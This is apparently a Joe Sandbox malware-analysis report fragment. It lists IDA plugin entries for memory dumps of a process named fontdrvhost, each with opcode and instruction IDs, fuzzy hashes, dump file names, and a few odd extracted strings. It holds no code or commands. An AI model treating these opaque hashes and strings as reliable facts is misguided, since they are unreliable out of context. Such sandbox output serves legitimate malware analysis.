                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
                                                                                                                    • Instruction ID: 29ce565ffcc28a448b4899142a808b5d3f0115b61ecf817ccfe49f91169fb415
                                                                                                                    • Opcode Fuzzy Hash: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
                                                                                                                    • Instruction Fuzzy Hash: 0ED01234B519044F871DA63888A98747391EB6A216B9550A9D10ACB3B1E96ADC89C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11f0e614b61dd8402b1f6cef3bf42be3e8dbf3004db8f484bdd3684dcb90d91b
                                                                                                                    • Instruction ID: 6905f788ba68b15c66f2d4d848cf9fbc097d2f2c3ec125657350389146f74705
                                                                                                                    • Opcode Fuzzy Hash: 11f0e614b61dd8402b1f6cef3bf42be3e8dbf3004db8f484bdd3684dcb90d91b
                                                                                                                    • Instruction Fuzzy Hash: B1D02230B608040F870CBA3888A88303391EB6A20678000A8D00AC72B1DD2ADC8CCB40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction ID: 90755e1601f702b6e1c2031973e5eb8c9d7fc61b61d8cc93fb74160a23460c41
                                                                                                                    • Opcode Fuzzy Hash: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction Fuzzy Hash: 71E01235F0D20ACBE701EB54C8D46ADBBA1EB52711F108275C501C7289DA7CA684D680
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction ID: 9f47ba4d225661f7cd5f4b457ea6ce03474966435a6b8b488fbb797968966456
                                                                                                                    • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction Fuzzy Hash: 09C04C06F5E51F01B417716E5CF60ADB9816BD7A64FD58172D70CD00C29C4D60D5A156
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction ID: a5f03278bbd3854106ccb8996a77adaed6fc78beeb62c6d1ce4d5daa04a8c300
                                                                                                                    • Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction Fuzzy Hash: 3FC04C349558098FC948EB69CC9591477A0FB1A215BD601A0E409C7171E65ADCD5D741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8d78488d99b53c3445f151f66e1b6215cb18ec765832eb3f50f29aa593328660
                                                                                                                    • Instruction ID: 8443d3d041e6feb84766e5ca6502d51d806cefd3e9f9919f382fd14d06b2e1a3
                                                                                                                    • Opcode Fuzzy Hash: 8d78488d99b53c3445f151f66e1b6215cb18ec765832eb3f50f29aa593328660
                                                                                                                    • Instruction Fuzzy Hash: 2DC08C00F0C81B03F1262384443127D84066B40744F840074E00DE63C6CC1C9F0203C6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction ID: f47800afbfc2aa90f4ab12d7525e20c9578dc74f2022646a9a732b5480c9cf76
                                                                                                                    • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction Fuzzy Hash: 9EB01200D5E40F00A405317B0CD20A4B8805B46104FC04070D60CC00C2984D10942242
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: K_^$$K_^%$K_^1$K_^9$K_^:$^+=$#<K
                                                                                                                    • API String ID: 0-1709254129
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: K_^$$K_^%$K_^1$K_^9$K_^:$^+=$#<K
                                                                                                                    • API String ID: 0-1709254129